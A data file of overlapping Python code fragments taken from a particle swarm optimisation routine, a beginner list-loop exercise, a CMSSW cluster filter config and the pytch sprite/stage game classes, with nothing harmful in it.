func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6))", "日志参数 logger = func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d", "pos[i, j] + vel[i, j] # 速度和位置更新 r1 = np.random.random(size=(popsize, dim)) r2 =", "popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min:", "* (pBest - pos) + c2 * r2 * (gBest - pos) vel", "最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值 | w_fix: 若w_fix设置为(0,", "import get_logger from dramkit.logtools.utils_logger import close_log_file strt_tm = time.time() objf = TestFuncs.ackley parms_func", "# 时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表 if not isinstance(x_lb, list):", "vel # 位置更新 # 每轮迭代都保存最优目标值 convergence_curve[l] = gBestVal convergence_curve_mean[l] = fvals_mean if nshow:", "= func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix'] c1 =", "if vel[i, j] < v_mins[j]: # vel[i, j] = v_mins[j] # # 位置更新", "全局最优值 convergence_curve_mean = np.zeros(max_iter) # 平均值 # 迭代寻优 for l in range(0, max_iter):", "{}, '.format(opter_name, func_name, l+1) + \\ 'best fval: {}'.format(gBestVal)) # 更新func_opter_parms end_tm =", "= objf(pos[i, :], **kwargs) # 目标函数值 fvals_mean = (fvals_mean*i + fval) / (i+1)", "v_mins = [-x for x in v_maxs] # 初始化 vel = np.zeros((popsize, dim))", "j] = pos[i, j] + vel[i, j] # 速度和位置更新 r1 = np.random.random(size=(popsize, dim))", "pBestVals[i] = fval pBest[i, :] = pos[i, :].copy() # 更新全局最优解 if gBestVal >", "convergence_curve = np.zeros(max_iter) # 全局最优值 convergence_curve_mean = np.zeros(max_iter) # 平均值 # 迭代寻优 for", "c2 * r2 * (gBest[j] - pos[i, j]) # # 速度过界处理 # if", "c1 * r1 * (pBest - pos) + c2 * r2 * (gBest", "j] + vel[i, j] # 速度和位置更新 r1 = np.random.random(size=(popsize, dim)) r2 = np.random.random(size=(popsize,", "PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf : function 目标函数。注:须事先转化为求极小值问题 func_opter_parms :", "pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解 gBestVal =", "# 初始速度 pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest = np.zeros((popsize,", "r2 = np.random.random(size=(popsize, dim)) # 速度更新 vel = w * vel + c1", "for _ in range(dim)] else: v_maxs = [v_maxs] * dim v_mins = [-x", "algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf : function 目标函数。注:须事先转化为求极小值问题 func_opter_parms : FuncOpterInfo", "= np.clip(vel, v_mins, v_maxs) # 速度过界处理 pos = pos + vel # 位置更新", "pos[i, j] = pos[i, j] + vel[i, j] # 速度和位置更新 r1 = np.random.random(size=(popsize,", "| popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 |", "v_maxs[j] # if vel[i, j] < v_mins[j]: # vel[i, j] = v_mins[j] #", "粒子群优化算法(Particle Swarm Optimization) PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf : function", "- w_min) / max_iter) else: if not 0 < w_fix < 1: raise", "= w * vel[i, j] + \\ # c1 * r1 * (pBest[i,", "nshow: if (l+1) % nshow ==0: opter_name = 
func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{}", "x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim: 自变量维度数 | kwargs: 目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含: | popsize:", "vel[i, j] = w * vel[i, j] + \\ # c1 * r1", "np.clip(vel, v_mins, v_maxs) # 速度过界处理 pos = pos + vel # 位置更新 #", "速度过界处理 # if vel[i, j] > v_maxs[j]: # vel[i, j] = v_maxs[j] #", "{'logger': logger, 'nshow': 100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms = pso(objf, func_opter_parms)", "# 保存收敛过程 convergence_curve = np.zeros(max_iter) # 全局最优值 convergence_curve_mean = np.zeros(max_iter) # 平均值 #", "c2 = func_opter_parms.parms_opter['c2'] # 日志参数 logger = func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录", "保存全局最优解 gBestVal = float('inf') # 全局最优值 pos = rand_init(popsize, dim, x_lb, x_ub) #", "dramkit import plot_series, simple_logger from dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger import close_log_file strt_tm", "in range(0, popsize): # for j in range (0, dim): # r1 =", "< v_mins[j]: # vel[i, j] = v_mins[j] # # 位置更新 # pos[i, j]", "range(0, max_iter): # 位置过界处理 pos = np.clip(pos, x_lb, x_ub) fvals_mean = 0 for", "nshow ==0: opter_name = func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{} for {}, iter: {},", "import plot_series, simple_logger from dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger import close_log_file strt_tm =", "[v_maxs] * dim v_mins = [-x for x in v_maxs] # 初始化 vel", "(0, dim): # r1 = random.random() # r2 = random.random() # # 速度更新", "FuncOpterInfo from dramkit import plot_series, simple_logger from dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger import", "500, 'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix': False, 'c1': 2, 'c2': 2}", "func_opter_parms.parms_opter['opter_name'] if opter_name == '' or isnull(opter_name): opter_name = 'pso' func_opter_parms.parms_opter['opter_name'] = opter_name", "func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表 if not isinstance(x_lb, list): x_lb = [x_lb] * dim", "[x_ub] * dim if not isinstance(v_maxs, list): if isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_]) /", "x_ub) # 样本(个体)随机初始化 # 保存收敛过程 convergence_curve = np.zeros(max_iter) # 全局最优值 convergence_curve_mean = np.zeros(max_iter)", "fval: pBestVals[i] = fval pBest[i, :] = pos[i, :].copy() # 更新全局最优解 if gBestVal", "else: v_maxs = [v_maxs] * dim v_mins = [-x for x in v_maxs]", "# 速度更新 vel = w * vel + c1 * r1 * (pBest", "w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max - l * ((w_max - w_min) /", "if not w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max - l * ((w_max -", "j] > v_maxs[j]: # vel[i, j] = v_maxs[j] # if vel[i, j] <", "not isinstance(x_ub, list): x_ub = [x_ub] * dim if not isinstance(v_maxs, list): if", "dramkit.gentools import isnull from dramkit.optimizer.utils_heuristic import rand_init def pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle Swarm", "= v_maxs[j] # if vel[i, j] < v_mins[j]: # vel[i, j] = v_mins[j]", "x_lb = func_opter_parms.parms_func['x_lb'] x_ub = func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] #", "j] < v_mins[j]: # vel[i, j] = v_mins[j] # # 位置更新 # pos[i,", "< w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix # # 速度和位置更新", "objf.__name__, 'x_lb': -10, 'x_ub': 10, 'dim': 10, 
'kwargs': {}} parms_opter = {'opter_name': 'pso-test',", ": FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log | parms_func为目标函数参数信息dict,key须包含: | x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim" ]
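
# The same linear-decay PSO update can be exercised without the dramkit
# helpers. The sketch below is a self-contained minimal version on a toy
# sphere objective; every name here is local to the sketch and is an
# assumption, not part of the module above.
import numpy as np

def sphere(x):
    # toy objective with global minimum 0 at the origin
    return float(np.sum(x ** 2))

popsize, dim, max_iter = 30, 5, 200
x_lb, x_ub, v_max = -10.0, 10.0, 2.0
w_max, w_min, c1, c2 = 0.9, 0.2, 2.0, 2.0

rng = np.random.default_rng(0)
pos = rng.uniform(x_lb, x_ub, size=(popsize, dim))
vel = np.zeros((popsize, dim))
pbest = pos.copy()
pbest_vals = np.full(popsize, np.inf)
gbest = np.zeros(dim)
gbest_val = np.inf

for l in range(max_iter):
    pos = np.clip(pos, x_lb, x_ub)
    fvals = np.array([sphere(p) for p in pos])
    # personal bests
    improved = fvals < pbest_vals
    pbest[improved] = pos[improved]
    pbest_vals[improved] = fvals[improved]
    # global best
    if fvals.min() < gbest_val:
        gbest_val = fvals.min()
        gbest = pos[fvals.argmin()].copy()
    # linear inertia decay, then the standard velocity/position update
    w = w_max - l * (w_max - w_min) / max_iter
    r1 = rng.random((popsize, dim))
    r2 = rng.random((popsize, dim))
    vel = w * vel + c1 * r1 * (pbest - pos) + c2 * r2 * (gbest - pos)
    vel = np.clip(vel, -v_max, v_max)
    pos = pos + vel

print('best value:', gbest_val)  # approaches 0 on the sphere function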
[ "to the list\" elements.append(i) for i in elements: print \"Element was : %d\"", "['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This is count %d\"", "of type: %s\" % i for i in change: print \"I got %r\"", "for i in range(0, 6): print \"Adding \", i, j, \" to the", "= ['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This is count", "= [] j = \"5\" for i in range(0, 6): print \"Adding \",", "is count %d\" % num for i in fruits: print \"A fruit of", "for i in fruits: print \"A fruit of type: %s\" % i for", "print \"I got %r\" % i elements = [] j = \"5\" for", "\"I got %r\" % i elements = [] j = \"5\" for i", "%r\" % i elements = [] j = \"5\" for i in range(0,", "num in the_count: print \"This is count %d\" % num for i in", "\"5\" for i in range(0, 6): print \"Adding \", i, j, \" to", "[1,2,3,4,5] fruits = ['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This", "num for i in fruits: print \"A fruit of type: %s\" % i", "\", i, j, \" to the list\" elements.append(i) for i in elements: print", "elements = [] j = \"5\" for i in range(0, 6): print \"Adding", "i in fruits: print \"A fruit of type: %s\" % i for i", "for num in the_count: print \"This is count %d\" % num for i", "= [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This is count %d\" % num", "fruits = ['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This is", "print \"This is count %d\" % num for i in fruits: print \"A", "for i in change: print \"I got %r\" % i elements = []", "print \"Adding \", i, j, \" to the list\" elements.append(i) for i in", "%d\" % num for i in fruits: print \"A fruit of type: %s\"", "[1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This is count %d\" % num for", "6): print \"Adding \", i, j, \" to the list\" elements.append(i) for i", "i in range(0, 6): print \"Adding \", i, j, \" to the list\"", "count %d\" % num for i in fruits: print \"A fruit of type:", "= [1,2,3,4,5] fruits = ['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print", "\"This is count %d\" % num for i in fruits: print \"A fruit", "% num for i in fruits: print \"A fruit of type: %s\" %", "type: %s\" % i for i in change: print \"I got %r\" %", "the_count = [1,2,3,4,5] fruits = ['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count:", "[] j = \"5\" for i in range(0, 6): print \"Adding \", i,", "\"A fruit of type: %s\" % i for i in change: print \"I", "j = \"5\" for i in range(0, 6): print \"Adding \", i, j,", "j, \" to the list\" elements.append(i) for i in elements: print \"Element was", "list\" elements.append(i) for i in elements: print \"Element was : %d\" % i", "i for i in change: print \"I got %r\" % i elements =", "got %r\" % i elements = [] j = \"5\" for i in", "in fruits: print \"A fruit of type: %s\" % i for i in", "<gh_stars>0 the_count = [1,2,3,4,5] fruits = ['apple','orange','pear','apricot'] change = [1,'pennies',2,'dimes',3,'quarters'] for num in", "%s\" % i for i in change: print \"I got %r\" % i", "change: print \"I got %r\" % i elements = [] j = \"5\"", "fruit of type: %s\" % i for i in change: print \"I got", "in change: print \"I got %r\" % i elements = [] j =", "% i elements = [] j = \"5\" for i in range(0, 6):", "i in change: print 
\"I got %r\" % i elements = [] j", "\" to the list\" elements.append(i) for i in elements: print \"Element was :", "= \"5\" for i in range(0, 6): print \"Adding \", i, j, \"", "\"Adding \", i, j, \" to the list\" elements.append(i) for i in elements:", "the list\" elements.append(i) for i in elements: print \"Element was : %d\" %", "i elements = [] j = \"5\" for i in range(0, 6): print", "i, j, \" to the list\" elements.append(i) for i in elements: print \"Element", "change = [1,'pennies',2,'dimes',3,'quarters'] for num in the_count: print \"This is count %d\" %", "fruits: print \"A fruit of type: %s\" % i for i in change:", "range(0, 6): print \"Adding \", i, j, \" to the list\" elements.append(i) for", "the_count: print \"This is count %d\" % num for i in fruits: print", "in the_count: print \"This is count %d\" % num for i in fruits:", "print \"A fruit of type: %s\" % i for i in change: print", "% i for i in change: print \"I got %r\" % i elements", "in range(0, 6): print \"Adding \", i, j, \" to the list\" elements.append(i)" ]
[ "<gh_stars>100-1000 import FWCore.ParameterSet.Config as cms tifClusterFilter = cms.EDFilter(\"ClusterMultiplicityFilter\", MaxNumberOfClusters = cms.uint32(300), ClusterCollection =", "import FWCore.ParameterSet.Config as cms tifClusterFilter = cms.EDFilter(\"ClusterMultiplicityFilter\", MaxNumberOfClusters = cms.uint32(300), ClusterCollection = cms.InputTag('siStripClusters')", "FWCore.ParameterSet.Config as cms tifClusterFilter = cms.EDFilter(\"ClusterMultiplicityFilter\", MaxNumberOfClusters = cms.uint32(300), ClusterCollection = cms.InputTag('siStripClusters') )" ]
[ "self.go_to_xy(x, y) wait_seconds(0) # No auto-yield (we don't do \"import pytch\") def set_size(self,", "Stage') self._appearance_index = 0 @classmethod def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name)", "= (\"say\", content) def say_nothing(self): self._speech = None def say_for_seconds(self, content, seconds): self.say(content)", "return self.appearance_number @property def costume_name(self): return self.appearance_name def touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self,", "= 0 @classmethod def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self,", ".format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index >= n_appearances: raise ValueError( ('could", "in range(1, n_frames + 1): t = frame_idx / n_frames # t is", "None _appearance_hyponym = 'Backdrop' def __init__(self): if not self.Backdrops: # In contrast to", "('question-mark', 'question-mark.png', 16, 16), ] _appearance_hyponym = 'Costume' def __init__(self): self._x = 0", "x): self._x = x def change_x(self, dx): self._x += dx def get_y(self): return", "ValueError(\"n_steps must be integer\") if len(self._Appearances) == 0: raise ValueError( ('could not move", "None def say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops = [('solid-white',", "int) or isinstance(x, float) class Actor: Sounds = [] _appearance_names = None def", "necessarily an error to have no Costumes, as # long as the Sprite", "ValueError( ('could not switch {} in class \"{}\":' ' argument must be string", "_y = 0 _size = 1.0 _shown = True _speech = None _appearance_hyponym", "class Stage(Actor): Backdrops = [('solid-white', 'solid-white-stage.png')] _x = 0 _y = 0 _size", "@property def costume_number(self): return self.appearance_number @property def costume_name(self): return self.appearance_name def touching(self, target_class):", "self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes = [ ('question-mark', 'question-mark.png', 16, 16), ] _appearance_hyponym =", "y = t * destination_y + t_c * start_y self.go_to_xy(x, y) wait_seconds(0) #", "_is_number(seconds): raise ValueError(\"'seconds' must be a number\"); if seconds < 0: raise ValueError(\"'seconds'", "len(self._Appearances) == 0: raise ValueError( ('could not move to next {} in class", "* FRAMES_PER_SECOND), 1) start_x = self._x start_y = self._y # On completion, we", "0 _size = 1.0 _shown = True _speech = None _appearance_hyponym = 'Backdrop'", "if seconds < 0: raise ValueError(\"'seconds' cannot be negative\") n_frames = max(int(seconds *", "0: raise ValueError( ('could not move to next {} in class \"{}\":' '", "( play_sound, registered_instances, wait_seconds, ) from pytch.project import FRAMES_PER_SECOND def _is_number(x): return isinstance(x,", "as # long as the Sprite always remains hidden. 
It might, for #", "must be string or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps): if not isinstance(n_steps,", "t_c * start_x y = t * destination_y + t_c * start_y self.go_to_xy(x,", "Backdrops in Stage') self._appearance_index = 0 @classmethod def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self,", ") if not destination_is_number: raise ValueError(\"destination coordinates must be numbers\") if not _is_number(seconds):", "is always shown and so # must have at least one Backdrop. raise", "at the target, and we want # the first frame to involve some", "t # 'complement' x = t * destination_x + t_c * start_x y", "it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index += n_steps self._appearance_index %= len(self._Appearances)", "x def change_x(self, dx): self._x += dx def get_y(self): return self._y def set_y(self,", "Sprites, a Stage is always shown and so # must have at least", "0 _y = 0 _size = 1.0 _shown = True _speech = None", "class \"{}\":' ' it only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index", "Sprite with no Costumes') self._shown = True def hide(self): self._shown = False def", "in Stage') self._appearance_index = 0 @classmethod def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name):", "rather than 0 up to n_frames - 1. for frame_idx in range(1, n_frames", "self._y = 0 self._size = 1.0 self._speech = None at_least_one_Costume = len(self._Appearances) !=", "class \"{}\":' ' argument must be string or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self,", "= 'Costume' def __init__(self): self._x = 0 self._y = 0 self._size = 1.0", "there are no Costumes\") self._shown = self.start_shown else: self._shown = at_least_one_Costume if at_least_one_Costume:", "len(self._Appearances) != 0 if hasattr(self, \"start_shown\"): if self.start_shown and not at_least_one_Costume: raise ValueError(\"start_shown", "_shown = True _speech = None _appearance_hyponym = 'Backdrop' def __init__(self): if not", "self._appearance_index = 0 else: # It is not necessarily an error to have", ".format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index if", "'complement' x = t * destination_x + t_c * start_x y = t", "@classmethod def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps)", "def set_x(self, x): self._x = x def change_x(self, dx): self._x += dx def", "True def hide(self): self._shown = False def switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1):", "\"{}\":' ' it only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index =", "def show(self): if not self.Costumes: # See comment in __init__(). 
raise RuntimeError('cannot show", "(self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self, content): self._speech = (\"say\", content) def say_nothing(self):", "move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0)) def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers)) def", "can not be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index >=", "up # to n_frames (inclusive) rather than 0 up to n_frames - 1.", "# must have at least one Backdrop. raise ValueError('no Backdrops in Stage') self._appearance_index", "to next {} in class \"{}\":' ' it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__)", "' argument must be string or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps): if", "0 up to n_frames - 1. for frame_idx in range(1, n_frames + 1):", "not in self._appearance_names: raise KeyError('could not find {} \"{}\" in class \"{}\"' .format(self._appearance_hyponym,", "# On completion, we must be exactly at the target, and we want", "appearance_name = appearance_name_or_index if appearance_name not in self._appearance_names: raise KeyError('could not find {}", "from pytch.project import FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int) or isinstance(x, float) class", "None at_least_one_Costume = len(self._Appearances) != 0 if hasattr(self, \"start_shown\"): if self.start_shown and not", "self._x start_y = self._y # On completion, we must be exactly at the", "self._x = 0 self._y = 0 self._size = 1.0 self._speech = None at_least_one_Costume", "_appearance_hyponym = 'Backdrop' def __init__(self): if not self.Backdrops: # In contrast to Sprites,", "import FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int) or isinstance(x, float) class Actor: Sounds", ") from pytch.project import FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int) or isinstance(x, float)", "contrast to Sprites, a Stage is always shown and so # must have", "play_sound(self, sound_name, False) def play_sound_until_done(self, sound_name): play_sound(self, sound_name, True) @classmethod def ensure_have_appearance_names(cls): if", "self.Costumes: # See comment in __init__(). raise RuntimeError('cannot show a Sprite with no", "def _is_number(x): return isinstance(x, int) or isinstance(x, float) class Actor: Sounds = []", "def the_original(cls): return registered_instances(cls)[0] @classmethod def all_clones(cls): return registered_instances(cls)[1:] @classmethod def all_instances(cls): return", "= [('solid-white', 'solid-white-stage.png')] _x = 0 _y = 0 _size = 1.0 _shown", "isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index if appearance_name not in self._appearance_names: raise KeyError('could not", "for # example, only receive/broadcast messages or play sounds. 
self._appearance_index = None @classmethod", "has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index else: raise ValueError(", "some movement, so count from 1 up # to n_frames (inclusive) rather than", "sound_name): play_sound(self, sound_name, True) @classmethod def ensure_have_appearance_names(cls): if cls._appearance_names is None: cls._appearance_names =", "and not at_least_one_Costume: raise ValueError(\"start_shown is set,\" \" but there are no Costumes\")", "a Stage is always shown and so # must have at least one", "'solid-white-stage.png')] _x = 0 _y = 0 _size = 1.0 _shown = True", "move to next {} in class \"{}\":' ' it has no {0}s') .format(self._appearance_hyponym,", "number {} in class \"{}\":' ' it only has {} {0}s') .format(self._appearance_hyponym, appearance_index,", "0: raise ValueError(\"'seconds' cannot be negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND), 1) start_x", "to {} number {} in class \"{}\":' ' number can not be negative')", "float) class Actor: Sounds = [] _appearance_names = None def start_sound(self, sound_name): play_sound(self,", "def change_x(self, dx): self._x += dx def get_y(self): return self._y def set_y(self, y):", "'Costume' def __init__(self): self._x = 0 self._y = 0 self._size = 1.0 self._speech", "# It is not necessarily an error to have no Costumes, as #", "Costumes, as # long as the Sprite always remains hidden. It might, for", "not switch {} in class \"{}\":' ' argument must be string or integer')", "= y def change_y(self, dy): self._y += dy def glide_to_xy(self, destination_x, destination_y, seconds):", ".instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self):", "in class \"{}\":' ' it only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances))", "return registered_instances(cls)[0] @classmethod def all_clones(cls): return registered_instances(cls)[1:] @classmethod def all_instances(cls): return registered_instances(cls) def", "in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index", "# t is in (0.0, 1.0] t_c = 1.0 - t # 'complement'", "def get_x(self): return self._x def set_x(self, x): self._x = x def change_x(self, dx):", "= 1.0 - t # 'complement' x = t * destination_x + t_c", "{} in class \"{}\":' ' number can not be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__))", "but there are no Costumes\") self._shown = self.start_shown else: self._shown = at_least_one_Costume if", "n_appearances: raise ValueError( ('could not switch to {} number {} in class \"{}\":'", "{} in class \"{}\":' ' it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index", "self._appearance_index %= len(self._Appearances) @property def appearance_number(self): return self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return", "self._speech = None at_least_one_Costume = len(self._Appearances) != 0 if hasattr(self, \"start_shown\"): if self.start_shown", "registered_instances, wait_seconds, ) from 
pytch.project import FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int) or", "Sprite always remains hidden. It might, for # example, only receive/broadcast messages or", "raise KeyError('could not find {} \"{}\" in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index", "in class \"{}\":' ' number can not be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances", "# No auto-yield (we don't do \"import pytch\") def set_size(self, size): self._size =", "raise ValueError(\"'seconds' cannot be negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND), 1) start_x =", "@classmethod def all_instances(cls): return registered_instances(cls) def go_to_xy(self, x, y): self._x = x self._y", "cannot be negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND), 1) start_x = self._x start_y", "say_nothing(self): self._speech = None def say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor):", "sound_name, False) def play_sound_until_done(self, sound_name): play_sound(self, sound_name, True) @classmethod def ensure_have_appearance_names(cls): if cls._appearance_names", "def switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps) @property def costume_number(self): return self.appearance_number", "no Costumes\") self._shown = self.start_shown else: self._shown = at_least_one_Costume if at_least_one_Costume: self._appearance_index =", "Costumes\") self._shown = self.start_shown else: self._shown = at_least_one_Costume if at_least_one_Costume: self._appearance_index = 0", "\"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0)) def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self,", "def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property", "be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index >= n_appearances: raise", "= len(self._appearance_names) if appearance_index >= n_appearances: raise ValueError( ('could not switch to {}", "costume_number(self): return self.appearance_number @property def costume_name(self): return self.appearance_name def touching(self, target_class): return (self._pytch_parent_project", "content) def say_nothing(self): self._speech = None def say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing()", "the first frame to involve some movement, so count from 1 up #", "_appearance_hyponym = 'Costume' def __init__(self): self._x = 0 self._y = 0 self._size =", "self._y # On completion, we must be exactly at the target, and we", "# example, only receive/broadcast messages or play sounds. self._appearance_index = None @classmethod def", "def hide(self): self._shown = False def switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps)", "than 0 up to n_frames - 1. 
for frame_idx in range(1, n_frames +", "1): t = frame_idx / n_frames # t is in (0.0, 1.0] t_c", "< 0: raise ValueError(\"'seconds' cannot be negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND), 1)", "self._appearance_index = None @classmethod def the_original(cls): return registered_instances(cls)[0] @classmethod def all_clones(cls): return registered_instances(cls)[1:]", "set_size(self, size): self._size = size def show(self): if not self.Costumes: # See comment", "isinstance(n_steps, int): raise ValueError(\"n_steps must be integer\") if len(self._Appearances) == 0: raise ValueError(", "No auto-yield (we don't do \"import pytch\") def set_size(self, size): self._size = size", "ValueError( ('could not switch to {} number {} in class \"{}\":' ' number", "{} in class \"{}\":' ' argument must be string or integer') .format(self._appearance_hyponym, self.__class__.__name__))", "not find {} \"{}\" in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name)", "change_x(self, dx): self._x += dx def get_y(self): return self._y def set_y(self, y): self._y", "always remains hidden. It might, for # example, only receive/broadcast messages or play", "set_y(self, y): self._y = y def change_y(self, dy): self._y += dy def glide_to_xy(self,", ".format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps): if not isinstance(n_steps, int): raise ValueError(\"n_steps must be", "_is_number(destination_x) and _is_number(destination_y) ) if not destination_is_number: raise ValueError(\"destination coordinates must be numbers\")", "appearance_index = appearance_name_or_index if appearance_index < 0: raise ValueError( ('could not switch to", "self._y = y def get_x(self): return self._x def set_x(self, x): self._x = x", "{} \"{}\" in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = 